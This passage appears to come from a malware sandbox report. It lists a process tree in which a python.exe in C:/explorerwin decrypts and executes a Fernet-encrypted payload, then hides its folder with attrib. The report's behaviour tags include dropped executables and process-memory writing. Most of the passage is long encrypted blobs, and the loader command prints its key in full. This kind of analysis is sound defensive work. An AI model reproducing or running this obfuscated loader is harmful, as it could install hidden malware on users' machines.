gDjy0hu0pjX1qN6-pM5h6rVMGAMzGvUVeOicM3KOQNcq5siam2eI40mD85wlP7HE5AVk40YZtC2JsRKmRSIm167MIQGJyi_MZhGomqVmGYFHUz-fRY3ebN0OCKONbldiKQ-nSg13B3Lufntni4Ms0FwcPM1VUWUNcWpA4J9cUQohWrhQ1xVIaMd_-eLC1ymUfCF7iVLQ0ucJX9Meyh_h2RjVrkqUjDpaEB97Tc63RKd32mnbz3Hv-vvjyQAoqVl_fVyZ4MD7XnllFEf60u17tsteIHGNK5AxrpNuk42XRKJ8hpwjY4V7ptCzboU_IxAWIkF6Tal_2e_u4ac8K3bmztuXknR1x50nOfpKN_Gk0YYYwsUO4EIPi16z9bvjry5vseoElLTfgVMfAJpjhGIc4LMeuGNyWqHDEkwKM8mvAQBdXYzd3VpoI9ljmUwhSw70QsXIhJgNzfxHrH2ig418FeMyl7HqD2kI8W1pTZT_RKISnssWOQp2Nnvt_BBgnzvxcnDG0QhkQeucsEbtZeU5TD9GrTTFViAILurTZ8gH-jc-O5nfdlQfSAa-Dp3zHybJMGsaH5kznDbJehWJ2TGwU43gglkTDh_VDc-dqXvenOGCKQvVUYe--oVrGqoNaMPXXRCSkNFCf3ncZ9MZH4hDQbGZK8Id9jhbm1PIuZtxpC7pO_ro30ZWLcQdqBfkLvn0-lnEOHIDWYrW-DN0AoieuVyMYjB4yVf8HxGUNdS8OEXkhpd0rSpI0aqlARGI40OyLDpDJWPYncIZHPFWzJlJnyDzVuV3EdfWCRzvcCknOWRNEsRVzeowhFAoBavMcvqOG53O810RkswWl5Jpd_hj5UfrmlXJg_igET3Xup_S0pkHQqCqH9hNDsQZEGGxscK0VArZZ9AL22TpZ8Dvtn9aeTEKyvMoB5MXyCvhNiN5r_MPS88KoiPHUyjK0qvh-GxaU--FCRXInPjhVGIrF28l89O81OcCXBIzzFFI1aUafdrdHt0ltOl7arb9SupsD2tlTw_OyvyVUF6THjUworoWaztg8h0SJYBITypk3xk_0rW-U6g1qeAbjKBfoK6rCgaeR-h1gLYa4PaL8Su7HsZYsUpaSoWTPhYDwRzj_grJHocL_qNFbtnrcgSaGHLUV_UN3RPw2lOwCquh-ypNg7F9A3Wlxubeqpjc0IwDLLreC6QYgBNaMO5HH-XgjTKhF0Yt0pKestIAPLVT3Mw4spK8v89C9w57QzH5tK0YWRA2FoqsMSLKkF0QWviycvxoV9h4WO5ibZ1g7qpcj-uvdoaaK8jroybv6ZxKifVNEMEzRTSpiFcgMnx9tC28hZofxxmKudllW_GUdYqcgX6fP3bw2o_PJQ86vlCDKtYooh9t3ckleK8UxJQhwr1gEdoFgaYKOVcK5VmU-cqrKDY7S9CQ4AhZh3vUPjTBGg-YqCuftnQ4IBgDQQ-GbNDhgzOPZ6vt9XtyQvm9Fe7zWvK-5ZVnChPEXqNQRzb6aElxddLmlfs9yPLZXEWBvmAqLAnmk9d9T3or9Se9bLjvPwWe60gFg55Ec-HKU4uhuz_suFGI3yBASgDnPe9nh8CJkki6l18iJlZO09lOaf9R0daRRECChzQM4t8vmBFKSjmmTXd-gK5Zl3DNyj2sszVJDkHfGSgq6mmN-1SXsxmSI0DmFr6juDVZaQqsqbc9Ia3lRO6D4ay6SUQ9sJQOdU6yYEt2kPzpnBRDi7u9Hf7Tylf6LwK9e8m19dQ6FDdBQ3KG3AAWRuXzYFFo2d345CixnFWi4H_wMyNf7gkir2hAajG4vMK_QZ60WSMG-zviFdTgYEBK3T7Lwp2ZXcRTXd5IC3awoH8I09IcJ8dmOT4bgb4-wxJ5ceA782qftn7xHzXIxT6hnCuybpJ10OV1FAnf-ZnUG_GoColMRHTIqKwJOs1XVJ1vtpYxxzRaT9YP3C_tqnAwfavBDLv5xROlLQ1yDHwukmLslufWlCta77CSwmS_TVvDvliNp-IlKe12cITmAJhCBlCJmFE3d2JfqugemjEj_iAKphMdpbdpGkTau1Fo_K_LjDhrWRa1AcM2vQ3fu0lmbQfYztSZZb5cnaTl770F52nA1mr2RGtoCEqDltsr8EHrvNl6K1ETV1Ut-wKWjdjsTx95OBlDroqDf6BtoV7UysetujdEUC34FUy_yeyrEBv-q5n0OAsoLq52NN7vrEf7b_GS-k3XBQCiXLNGdCZLrFwSdpHq-NyGhL7O3pjfmDeHufFjRwugLvAPi5iFE8jsM6u8olDNJloQ2TEd0ewWqmO5_GFStCAyAD2V1RS3FvwVqYR8_wik7MNq2vrXOE1KWM74hPAvnU4v2UpCa6UmSBgyTMO8-dFkq9I56tx61LwNLqx6I1vwuOeXJPEllDQfCz_KHRk6oVXXs9_vvSlSbEaTzwVb7KSWUwB5kplK3NijyqO3xDLEsnJGqssw2U9DEBd1mmFojlECNEfmf3B_vaIQn9UHRHN2-y0Fgm6qHNu6eZkwuassVPZV1v3cWqzwuFY_qLc33JjIqtL72nzK1NBsnp2m2AtNSWsAmAVeL8Y0eCMVGKynTOmx7Da3cS0PqXXzfR4JrbFmUV3rSLLKPWKR4yBZENPAChH1dtlB4BCsa9er_gi_r9PppgUVLZ2L3FcLIm8tlksH56FSNR8wY1StHniVL_KIcLsSRYGU2RZqT-1IH3gpZdjqH-jlkxxErWzZpyeRUPF-RNcy0ZCuT_KfW_qGCP-901MDay2Z2yU_izrns31laTa6ir_Q_mLIw4pWJLSFxvtjLnZJfKdW0aFjLlMYJrgGv3mt2_QCCmysvwYOJfImNPvO_VrRc9-uXouN9TW9F65IYnOtnxN_bNYnn0ztGu0-Y43XFrdqftH_uk7s_xoPV3R6WVo4kKdrYQSbaek_SlLgaNliSzKfrsl1AX4Cu7NZyKxZ7qoVdOAsPgupyfCwQYNFES0GyDEBe2wf5eqOh-XmFSNL7Y7LZnVrqb2GcueHB_DCwWCIKVYqjbdF4ScWVa1TsqdES5XIZpaOmEOTNfVGP7nQg29vqnoikJzn2l1IDxs7XEMBdQJL_qiknzUlF4om4xP1kLFjZWkFQnamS8ccF8qQtDEO6CvHovytAnVVORtRjqRfE3JC2IpxFdtLEfWrqBueDnFJ3-UMvNvFcDpg_O6zAassTEiz1rrayKpX6kfjV5__KXArvOQIfIWSq35YCK8HfsGsP1Z0_C1ryTRdrWaqABrVnIovInaG4wQai1rXD13oxPzuoSniBMTh0MgEARPX50ihLScGPGzIT6J6GJjG9HH0x_Tc-lkj-52Blz-wwE2n4dkNCe6Uga2IJiLyV-6OjVP-VoppPUlDvD_Ywhkxe3VPfaJ6zj2O5AzdzUyPGZI8iJpuMRtApcPUds3E79WgehusM3PoDkIH-fB3sZlbytBD9Iv4GImj5aN0H5xnGO9nCUPa3nsb_NqEKpcfuR1pkFfxnVUYznH3T_5ABxj8RYZgJ_3XHFqS9rpDep9TcQCU7dFOKLoaYr-ZyNhZxoOqPINQ1w5mkm9sxG0efv12UJu05uBjm005XECs5qmYYOOLC9ryOwkhMDaUEzFZaOgIGN4AEKKBX3FsneLO0xZFg_k5e7ifYpVshzcWXTIfNnPzdO6noGq50-Egrlv0NXp6nwvIKparzEEcghJKNj5m5KTiRC_jIHdRdlqKfPt791-HthSU5OZnezee0WL3pOUR-5HhqapysWhnvHVWAVzyKeMBRv1GOmd5QVS9zyEw52MQKTENmZ95djihvVPheMujGqYJ0rlsPC9jUDszJXhQAES_I3IixLJHeReeksWzZR7ASxiJ2ljNXvKSQK4iOsElwTP0MKRibQUQ0QtfHVWyEKy-SM9qkxA7pGLvT1yhoUqqT9SQ2pZLjRa4KL5A4jOkENRXlEq67s-hxD3SA6FZFCP08ToN-j0MP7J_Lm1NKfrz14pXkAJ_u8qHIJCE3AJJKYYpedbYBybz7Tq-Oz8aHTK0feLTh4zSs8CT2OnT6rS9nR2KdGRz48S5hFJjFm5LtQ4wJE1ibZTjPxJscVUtS4hNGqIj8s9LsLdhpvkIJVMKgSDdo6piNWSnqpHbpluEzvWqckkEoQFDO8pb_AIKA1dMz3iBAxSBaGSSO-x_aapN3m_5fB7osu8MsWjpJx6aSeQOXtOSFEGM0bQdQpfUIBsgl0saaPs2M5KyycUqI278171tYEyX2Fp1IQPiOEMiLe6MI5QP8koPBQmHlQ8HgROxfEELcWPT4YczsKdpz_kkrSx26yxlBQaKISo_jf6yOQew3kweohpe8rCH1Je6lWgWyN5lQlWOLlnH0b2HCYfUZQZnsYoV_32TaNnFRUqdmLFZKgn3bTwoSbOwTiJx3WGR2aZnczkFmuqzS7xxWqTWNTMclwLHwHgPIQeHQTg7xTgWoW5t5aZH6SLs3yHMu8bmdaTK0Hu-w6voig1Kma5sFrQbJZR9QBgQANfJRVJV9cpReveXhML4vuVbqptw1kJF3Ob9_h-U9x0-EUXu4BgyWeW7_fBM7SeuNicTcLunWFD2AKDxIARIm-G91XdNWRgYYMxGQqrs7L_V1IMJNH6-xG2-qChZE8cwb5KzGt2dYSsmI1oNw60dOc6gAhXeLNA80QjjNL9tV2Qs-Fx-oOhT6qUdk8xQ6ra59iiuzZbCUAzjkMLc5-2oKQBZrhV0gu2iQXN2OVGGimFxeHbahGmITpR3fBGlvdkJnCbOiJAMy4vYJKZz5qWCguFKRw8dieoNCAhzcVZRQJPK0k9yYrNsuIrLhg4obTEQI5gTab9LiP5mowt3EqZKPAwMe2Ja7FBCLLqaEjaamRgZsZpsFplACnPEFi--IWcWSiM9IKNmZKOPT7nLmq4KpDOQONZ8dG8sbvrnryaJo6q1oDNgrmDqWx02sJ1D0pp78GZepBEyR_rw5i221lYb6ooNf4OzCzTsrW8KmoyxLh5QaNfJpbWk8vsD0eWvoIHnmiWGJd3qit8sIVzKKIcR4uGLnwcx-K4yKMlJI33nJ1Xio5H2IFWbanSEsC8gyLyDPSerJLKz8r5dOjWMaTgCSsONEly5QGueI0CSQEJDuQx3XLTjojQnklKDJhy8fKbeAf1ZXh3rY60UAbJ8jzKcauyQx3XpXMoVT0ZLl2ZHVYHKyG1OxJVN99vSgCSFjnlH9kBx3TdryrdMSpIYB9TbbUOU7MBM8VFwM1TnYgNnSJ1WcZEQq4SlsAY5XU2fhtpOnyBhvA8mrbtd0P-338dDsRIW6PffEfgzUV-ej9LGWO2gJj4AnjduXzTyejtH4fInjP1mGYv0jwQaVRmvnzTGqI31WyzI-2RRKRfJrNRFYqu2Q=='))"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Network Service Discovery
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3120
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c "attrib +h +s "C:/explorerwi""
          4⤵
          • Hide Artifacts: Hidden Files and Directories
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:3748
          • C:\Windows\SysWOW64\attrib.exe
            attrib +h +s "C:/explorerwi"
            5⤵
            • System Location Discovery: System Language Discovery
            • Views/modifies file attributes
            PID:3804
      • C:\explorerwin\python.exe
        "C:/explorerwin/python.exe" -c "from cryptography.fernet import Fernet; exec(Fernet(b'PFEb2Ao_jLL5_G5rAQ1I7A2BHguUlElphEwsGEaRwj4=').decrypt(b'gAAAAABmfoINJVlXvqn2brsvCgKzfkB-g59upowhKnCCk52XBPXnUmVptfmoa6iIO-klvSPReT6pqVUXZMFf0Aj74ex1plnzU3BuQ6ezkTh_Mdrm0GS7K3f6F2S47qvHkLPuANBORie0cgyH6vPMILeyjPoiS0mBuJHDl36qy-2x7p8rkUx37BtFbZY8lf8V3-T8JQoo-SEIuGAWvqdZj1YunvT0czyL4aTPTx7WI5JIEMuVZHmigpF7dFL11U1fBG2q8dq9tpZVNL5HP_Ar8QdQeqwdbosftfU2nyEMigWIxgZCOm5MX6qQ6SyH3ziICr6GghRBt02k5wTil7tWNzfGr2oN4se0XAyQ73UwFpq4uPlmF0plfLX1XFp7FvQzv0iZEE0oEx2-MzYzIrw7PBEROajIDXoX5HaDNgHT8yBSIRaYBpzon9W8C5XP9A2hPzyiPC7cmtj8DJvSqaBQ4CUyEyMHMetlv1lDTvsmFj8kvcFyj9QRvGax-ZhKCU5eLEtxIokop02P39ichBPyvluSS6G4h73pYIZGN-AAPxvnDn9rPxy7BZLJ2ev5aBcO3HWpes2chDDoSqZ5uQUUqm2el7eWRj75lZPfToAlD2Wq6mvZOuRzkczeEXQ1PZ5xaz_MF0kcJopLBGCAgiW_TyeRFVEqyfxtaZIeGwKFebVNEBJjT92_PtQOmsNVx-HLS3pgtvqAG96fTrleJfb0NyS9QR-cNvNMsEihEIrlQiaES3jy5bkLYwClMDdjJSXOuVCGtX4cpZ4AgDEt9a9a3IlNQnQBtjWhgM4noOrxkKwP2rRu1-89txPqGt_ZHqZnJbv6647UoNCtdWN1otZ8Ge1-eNM1Om4gz-gnfYV4ZqDoT7LEyUxTA9tNMdUVI8kdg97bEBh_ZMUw4BFATs_qiS2Iidi5vqePB0tt-UpI1lsEljUSqXNpvLErSJfWHQPXUhB60xe-vL8PNcyFjN9dEz1ffhggaA6bwKSQ4zDoHpMLLLXxi8gVpzczWEgmP9Vy6GK7cTADgAkK0TweY30x1e0rLa7iG6o2-SOO5WauMRr6Vuo92jsMIzQ8FfMr9tmQVf8L-NWKOcAv_CmRGBC81tGoDSaQMTSh5cVQvDnSokXQ_SNE33O31U5UW8HGZCruRp6g0umt2fQIgwOryfJZ1wCDYU8r5pnVZOcRls1EcyjC5A9E4Tr6bbpaVKQGFvv66FppGvL8Fq4k-kHNLYyzXL7nQfh9oGUnpQe2c1J0hs0Og1GRo0rk1booAN18jW8oqtTf-QAx0yU99KH6smwhONcJKXmARG4l5htav-iHH2kaiTVVih7YEqS55zHBXICTffcZY1L9G2LfWI11H13Ply2335rGsDcC0vDsQMaOVo7B3aLWBonSkOxY4T_VUnkVK5J0d-D4QHChxKEHw-0duZndQy1P9phxa_1zT6u1H_wYstF2FQJYXvaOLKIqUcCYtaeVbSMZt68nmozLQ5u01CAyeW3gl5Y0O_ngfMSqq-NPCpoGyYxdNguPrutjqKqGtF49aqvBlhziSSiH9N3JgFUhzIkhm5k33tKGnC6DB32HTjCOJYtjlIih7Lj26pKOSiYH_YuH55J3jKlu70kdJg9HuLXlgH87k39lUleDke_q1AVbodQgVLuijFdCE009Tu9CknCcQH0ok6Zz5EoyMjY8F48l4Wl2RIm8YvVE30E6Rvz7upCo5LJoCn264p24nyYGbZCuB4iAv6vaAzr3kGSBT4dh7mGu3UlnFzREC-ZTM5y85I8qPYUiYuVPsIQxf6nEwPTnI3QGsXge37xHaMMQ9ZMU7tnE0T0X9kLhK9OUic_OOVyKKDUC_VHqX2d0BZXPDC-O0KQPjvGG-NGT-LUUUDIuaFnpEd4wBfYJKQi32Xi1oL5jWWGOPBFmGMxKtmjQruzF-hPa09gQ9rYLGj3HO-nYadnAZLbi-tIHesyxgNwU7KPzOBrxBwNt_VY2rD6B1ujVtWeORFf3PR5BpCJN5bPkb5gLbXhqN9GMTV_UUYfqsWJ_xGfgTwU0Wwc4VjRNFlN57BQj_U-wijDrSfn5ld_CdTpQ2mrGP04syMjfyC-bXA54nACQ6IpfBJyKDzJLS3TtUeE3zNdysVuXuD42rYnWOT_4ycfoqOCWVrGcD3PnFHbq_O5Lt2P7-nLxvPze4LjVED5WmLzUDilvRbOqJHhhCXtcGal9iQw27iFl4MwFsVidU7T-KTkn-bQ-6JB_B6yTDtfqlCitVc-DvpNfoFCHXeUbR_CnxnQQmz_P-pMVFEXRpvD_Tp7HdDSjJ7NMpUtqxKllSx8aRNr_269_eQU8NX5JbS-zb17YnIhBXOLPHBAm6ngyecnpSbA5qbFBlyx4GLINrIrbhn2a5LbbWmDrxtbNiTPO-M3uoZkVlpf6-2mkIPV1Hi-6nNd3Hjk0q3xSRnw7Gl7tnmGs6-2JsDYiM1kqivofCc5CZryfebPEw3ipGLhhuCfI8KdyaYWQTDRQ2iJ4rpy8y1ybzerrYet7N2DZwWlxPLDWzk00zH_gvkmmKU9-olXFq8FOU3qGZ8tToDTpi8_-ULvqUvn4BEHqsDHZIAKjKnIjObKrDJIc8XluQlmGpqF-L-vbZz7kl-s7JRUKZ-blhizlhsN8EeSUdtP_8g7hQ0AvF93LpKAMG7X576uDxWmFd1S8D1mr4um79DHyu9Tvr8IS5KCrQuPOKnh5hR-AZNkZerwmoR6ANUGOl7bR8Chbd7NMOHHqvtaeE61pM6QNBjmxlVD2lS26xEgXGAMFMS1B49lrrS7Det6ms3ym8ABPJQwdbiwjTr8FkboFZUYwAckwVBNC-_GUeludRA61VQrkWKt6YrAGMAvqSuLpN6sZq9Tk80ZDjYR7n6qrHA_gSf21tC3Ft-8hDUMKhJ8QLJlYULIKkwJj2WR8SFZVJYAb-QZLpQCEuTcTRpRLFvVkk_Ysb3g3BqOEt1rrKd2QgYUCIi3gnR-qs6CxxcKKeEtOZC6cJlKF1Tkm3S3pSizuucYEC-Y0ZeJ3Gwq6mmr34sWjVFGjSwtQ0Ec7X4o0ePK8r72AlFZWtnR0mnZytL1jv-dQQeV7pc4S-W4EyNottheVQ-ITXOczYwQ_93JDohnvdovO15LmNCwa7MIQQXoS1reb0mK0vjojUyXRNXFzdUgGnzTEHk7LGhJPI7EN77Rjs3jhC649zeXaRMCR365UddwKSYJQk6S17CvkEF6tE3511HKJnXMWSbEJ3r-llNoxRvXPayNH73JYHlStwLJ_P4iVrynLT6LLJuwZXaBqOtkKS1k7T1UJdLpVd0dNMWHZePpvGg8E517aSS_UBmoVm7PF-VCi9zBeSpjnogLYWj7Is2Z9Iw8Fjw21ZBgoO2I4wDuHlFqnkuhXwUpirvNJ5itMx_Zg9j3UqwsM6E-Kt4tYFzCxut6nWTd_wAc4wzzfrCkqLtJ75y1rzawZBnfYsAzcfZk5zSBn8L7JqkrMDXQvzKIi63ynvgujG6f-x63fXmShApKn_trGngeWsjlpX1s8QlWDsvt1d00Rr1ewD_VoL6-QSDiFUKWLTl8hAJoZuJ_4fyduUPiqlpFP9yxJs-zWvD4wkU0dQBH_pIxP44IfycvJ8vr1a4pUsfDBLgaYDdmAO6ix2Sk7UarHWX6L_5ofM6K50QKpZEj9rTLgJokwPeo3izq92bULG-Ltmf0-cUaXqF14qeuc40zGziwoXGs0BQVUPQ2QVcgGjqPXLyo9d3k0p5sOPH8sdSFr3nYVRgjhKMBbv4xA9Dv3ZpBYEscY2pwngrZ14frQvzqYEqK5hlxx8r96XmDBkgi_muELrIZS98gHXpik7TjT40uYFlTpdli1VTaJwHUVi6ea1Leq5PkDo3nFgXFZhFpO-Zo2Vb97tKEcpdTJnmHqy6h8MzDNxYLEwJoqnI7mOAizA74j3LY9EO4J1X3CNbTYo4MOveSGaMd7v4odVijwFSQmV963G5jNsetVBpudxzk0MvahhaabxA4XgaY7u88-S1U49UychUGYvFhcuosEIO46SKPNAQ2MJt2B8_FlwMBsC76WiFUSCYTyAAqXDCDyZ-8yf0w4B1SQkVoR-N5iHW0Y11pfMBV7Q0KgFJzCZppTdZbJ7cKVREjW9CMpWcM4LZjVF7tINgAJAU8ZQl12KE-1gReT1fxsmvLBAxNgofvf3na0AY4ycE3S-P8--YmZ1n5GwMvOWsAumr-4gUG0QieB3Jxhgi8e_US2mFm9try42p19bVA3M3DTuNNBc5IBAfIyaoV2UBHVBazq4inuXVVCCMyJ0Tm_Zz1YSd3DnbPkce2eZD3m9Hp7x1JXmbmkNnIZ8Y5tVCTykwRJIR8my0Z7bqRhY4GSe8KOlkJMHRfgdohGEqRXq-oZ9QxiwStQv60InmmqFdEjlBUd5JmsGyKMIlFyTbeA27ZU4t6SnyPtYNOvqVcgbgAEljz7xv04n_oAbnvukn9ni4TLZygvsM7xf2hP9MuTN3Xv-TCNTic6zV9pY8dPkc3Ec-O1ufMlbnXfEXdypxv_LJxfALEj618wrv6_85kB-fK701wVnwk4PKENuovspV4Vh4IXdLlIxAI9c3-ewIsy6VkQCTY7oS86q6cDcXUQLhb-22EXUaGzBSldprg8TRDy2PMGviEcCtqZopnsYjx7eFrY2Q61cf5dV2FDCJm6FMKea3LMfpCo-4KGbis14W6Tfg0RYU5Py5e1GxPBOX-IoC5lleFxEUFNb9eFK9ei8f4svrwsXfgioW64a7VU0yvgr7pIG1ELxTdxgRaR_YrP_vtewOyrlWC7sseiLW8FTFZXL60jpVb7fUqpJaqxlvYOspr0KIHf3UR38NrGAr95c4xcI5GeQZhMpROTkE7LOQ6g7ppjnhtIHjsAQsCZBo8V49BUO1LszqQ898__iV2M_tKq1GLPDSD-Crq4Rxt3q06qOYrgAbC5EMC_wwLzZNdwLhDZnO3uTNLHtXpJoCXloq2KIgOZCHb9vB6f7lXf5JkafRLYpObYunZILO4De4pYBB6X6F-NgIwzQrrhV-9x77eCzauS4CgIBfI7RZGshvrSrECxxS4CgxPxAQ9I6Q17td7Gad-shB6b41DRexizKX0qxqf19lDCyqwlvA59eGjUyWs5xqc4WO4cx-quWIsGg52nWbqxV5HOHbuzKSiCP0ZOlPmrCQK57Wjv-f-J8iOHtr649TTCy6uqj1SdwcKFFjMIUta67A9MLxHSY6WR7q-S0YMOj5wGxpK1O1OjGVLDRJdWnfyC-SwXOusTjM3BGZkoQe5fQai8LXq3Ek1V_6vnGaW5cBR5lfEAwUxKGO8DGXGExSoTkAd5CnSlB4ueJFxYlKeVWCs1Ry-JPJGIjGy_xj1YepJg3RLRmTvaeiYG1SHvPMzpy8qYK8UkJn8z_PwGU0r9KZWaaFuWoTbZeU8NR5verEOtNFyMOROJr3UIO9Z-NYOXnNXZ8g-tfb3bVmdMZRgPe3W1gfkUJ6vcmI7GSmB80kTdBsQwfGuQHVR1jrQkahI-fYvH3gxYvEl8CUWEL-DGMUQ7fEY8oc-im49NwjWQ9s_3timTkONYPfKTQKGbDjzX7eGPtWz5MErlmmulrJPX5HhMqwVH3nqCoAU7ApXqsQ2leMTs7KixN6dU-7qdZ9dI_0j3Pv2FOueE9MsqAOtP0NeFdxkjSxMhK9AM3dAz2gYjuL5mZXLBsNmpoMxuDrkBHZaBz1QrY5Ub36Ow211EQakDBINk_TvQ8FSP7HpPd3ZE0wQjx82-2Dn0yWXRj16sGxTkUc9mYUwI8n19iHPKanL7Wt0ZkLSQEwLYRiPhdinlwA6__iV-9ZvDJGP6Dy7IjtuOf44n6XH0phTzTLdyOKFy_OLXnr59AON2MKT_22NUZ3XXyTw9zV5JUe3VW3ueISMJ5obWZbU9fkUxr-XHbHRhUBORBYsWA3qFmyAsKf4n0ygKuex2Wyfy_JoS0DIoFK6lhsGnADHmAHuXYnJaH-a0XrPqCoFmTIQuO8AoxLkhk2gcBivfkeKhV7vCOp-wGz4EO97aSw2Qz3CuQ_AzuEGWH82oR97Iih8yQdI3qfNq3cu95wjhtlpL1yi8Rosg4ur7RxN6rcLRHKgYP6gbuJti5Z4mSy90niJxosNLsHe5crc9Q7HbjoCE2ByqJ20zaPSGkNLRcxtHYAOjdJRmdJjApaJpJCoVw4z2kDs3RBfULbkOHcEgFneqkShm9aaLxZcwTfCcekjAACoLXAu3LFbv80WWrVkc0rhnbC8nzy9fGJlAjQB3bva65HXcVLM4yWTnPDRwrMAHjlnb_a1kZshEbQVTOIiCDTgJHwPoZOCwnU_xZ736Tc5l3282C0ferUFMj6ix3NH877jz10rXomD5NfDuQRw2tN9eti1payHoQeT12QYugCg_vRT_YVFbqmL8uQcdTL9nVXlV_vRC6_ER39gFc7uFnPgUMxAJwDkMuxQFzRA8VN-KD1utzouiGazz-oV78uDQ-qs8QHYtYdWRE7FYz4Ra9s9E6ifkjSHUGb6lmapemwCrJtP0XqLLuJahuH3M-C1BGKqulUV5jW7GOyW1I5ceO4ZowJMNPm59nXQB-lduRN0B38siOCAej2EhWFW-eTQJbdGv5XZ7naO_JGwEjbdiGDvLEH_zjqpwcN7bMe0awFa7PcQafjhGswQ12KoGNIpCCNDW6zfKBLIpT25XlfLxLczJowdhKyJGAraeYSaSh3BmTdGx1wiiwmlMPPfZMkMl6E48Fe5Xzr63HnGBffiBRtjE4bVJz0JK_5QE6X3swu_uka4e2tysAyWhH9jMWLJLDkZvjfkvWXq1XVbe1eu4INN4Ir4jYx-Ur8WLWnFCX2cM2_it45UVbsfS8X1gX7vkEVnNwE4vQxCXvLufcbcaTyE1rWy16QGNZPAasGgFr8QOqpq07egJWVwq9YvAZvVg5MnJHUQylcLngUBlEe0na-U5az_Nq8qP_GLYHX2RSaAIbrnr4lyFgbf_yooh9OXCXzjR7tqLH1ie3-DVD3fJBIqwGn-nNRHW2OdET8MSH5F4NvWp0OSoAycAtiPPEktUGXxrbLmh59tlNgIevkj5yzsfHK6sCn7_MrpaabhSCSbrkodhIRXySSFS21inXQuqMhWo2XpwqDLJ0NkzvrBtlq3myjnENk8Kv5NaJ-JWyPv6Dzm0x25NG6BXk6omS-QJ38w06oxq5SM8F5741xzpE4JF2tkKAIf7fKBg502ssemcP7RsKW81kLsbMpR3DF3LakoHyu8_prD-wGGwwb1nfB7DyRXw6S-3NXcVy_RGClfLUclM8wU8yNH2B_4NugFEmeARHm9ZBRfX-xsZIplNIX5wL7zJlKUaJe3jPLjUzaDry3GLl43SBxtRvPLYHznXmNiwKLLWCmHXxVyfBqk5WnQfZ4enU330xesSmzG3JS7prKGQ8jyvkcC-TDIufgV663XPZPTIGgICyHtcwHkRh1HyMEmt9T9yjKU1pJEbURzgUW_vj0N6tS_uq_2pHcgHvpPFKZw738D_G2Z9ALfoyjSCf6s76eNsvF0TyGmSN-JJMiLTB9Op85RMh6S6Few8tMiYgEH5GXBA4Qt6YDGllJcY8ApQIGhXd0UUPh_ECncx1sE7QS5odD-RS7rgR4QkEFImbN72vKbJymDwsH22eoJrRe5hlm7Hcqbdq8qEvpp737gvWnJklyc92pwk8nINZmy-_GwPaSZReI5qZ3G4Y-zo35om1LaAhU4Pi6In0lqprptnDObxk6jkBhZ1jgZQMi49IXt8WcPuK-SD7eNEsd25W2cbx0MQpD8Y0wEftRpsQHr37S4zZzdHVnQyeLmSx8GJmV79ULivtMbcjeMtfqyzgJ2UHIM5Iv1UppiKXewB7Ho8AuFOgiWR0C9yk2bWiT3JJ8g5Pyh6_02UM2u2FHOrpYl1JNZemUoM4AnV7Xi_63pQPpdjH-b1fa0_uvlArz1m0B78JTOgX5hYVNudyboJJT_i-7ipp8mPMGGjMYIKJJyCY2GyOUIoycFyJqIYDUhxEEBXIaoe1PrXHiCK1lGycxjL9zTYrsZoMdeoQqDbox3p9JMEkHB08CuSak9zkMZtIBy_cRXy-YhSDUNYpo61epQiWdFLrVND36ij88weMkCbNgPDZc2AqJm5z3iVPfV128oVgAHuW4yvEPivK_CYytQV6jYTHkJXRqyMTvsjoMMVhIie-Ac0THjj1TqZNdAe4T2nMmaw9AfkuiqtzVM-n13bqHZKWJZNBtvwivW-Lu7VMKIhvAFbAkSSSINB36nSkapBbnMcFw6-Yi5a2nmsK3bvWmcX1LjOFm2yfktls_kYsNIBLfKiW8oz88izAQQ5HWyzZM9MbKKOHnMVFJPbTntfT8q3dwkizJTUeoO8tnvpojrOLqjR5__tC7eHArby9WMGk1O6P5O1WzNrcZqtyLm8uLdV2NmL4VoVhTgHWt_A_177nPICgECtHOHq1sELkJj_-SYteZU9pAJZCWytFRbuAuGrPLxxZYQO4HwTuEoyZ2FAkfNlUx7dbfP9mNZK_fCxqloaDWpkavvA-ohf114vDy6Wowe3Z0Zda0c8hrxcr-_GG1l3hQZ5yf8nHWLY1XirU55OG6_qHpYYeInZSQU5Y8UybkvpIA5s4Fe1Eyv2Q3f8uwQSPbCzaSuPUf5G8M3vHFUTVoziYmN_9WGnpWvmSXMAI5UO_nBTTKmYpj1K4_KA457TtxoCIRLTuw66Zo9ZqVS0QZRqa-Hu8q4dZRzWH4olLdcJTgOLzdE6CrH5WnnLQF_ayvIV2WKDJxaVb8_1eQM4naQL27W9zrCqaodD2bDHrQdwLXeAeWYnT4bwJu4Vc10LcAttQxsR0YcSTKKzRk8Et45KILC5JkXRkSPtBIn3eUdRvldokB3CmL6VdORULIKSYxjlLdi7t5Qwc-6xIf5LgOI9hiQnE9lxMYfkha-Ui8oQqz9iw-v0pUZKuQm6bPuaBWBLndg16qBD2YwrE1LWCy5o4ZFnWNOb5ERXyvdvdyfGx-b0ZtkQqeXrnsnVUho24673NtLuCLUe9r-ux2NpMgpIyCOPD8FJ_bQtTxacEqYHjWj16r-fvAaiZ_ivQqJvnWYv53g6sUAIOMlhKxQzwXYvynsGk6Uj-l9bKAqZnQnUti5curfq56ajd2JR6kC-1Z7s9aEl9Xv-fewPSpKysM2VW24A184HUGDtwEvCo0Hwf3NHM478hmeH9sMpWUAG3c3XeNNxEigt7rlVf7enw9DXeER-zDG3dIKry8Ch-m33eSxnFcmrphDtEy8EElh_0MYB6xr8wbfHNdNCI_amEVIinYSdPv2vZe53T-BZA-RYAVvi7F2c_rHu8-JWd6-iAgJcgmfZ9F9Eka0wBFac6N5UeCPpIyDxCssJBQsrJdBfDbxeEiTMcB_pEUdXJA7gFG0FRQxMiy5PsX1EXGSiMj-i8y2dVSgCYsNNAp4gmoTAIHZvuc6Qw2f82GEqXrJCOmF7CepKMiV4gRVeC2K0mDQ2AvO44voDusPwxc5kNW-u3_RPAqs6UJlrkVxa_rmA7TRD5xk1MNXgu8_d75w-Uw5e0cjRknwKmwDQCNWRhxMr5TTKivBBb6AfgfoUZvOXAq7luw8kOs_nQ-GFxYIvzdc2oUjbUfv5D88eNfL59iltnmkS46vUJbq_l7-UrEVTn8mtm8YfmaNOpfwHegKaAv_X0J2X_lrmvskUDnsCwTWT5OqfTiLtdiIAuTJG4cnTB1WAQNr-6lHSbDXleZTlaqYivVWXk703UuLyCO4VmHnQ6__jG0VWAI3azn16OW2hzuLSo0Nhp3rLm8gETwvPOD4oi860UJnO-UTGy9IUv4I5fqmKgXHpqavsc7ZOVQl8am96ipB0zZOLwdZkjJjfw7RNonuT_Iq7RVkH8c8LOPsYXdOj05pHmqy-x9L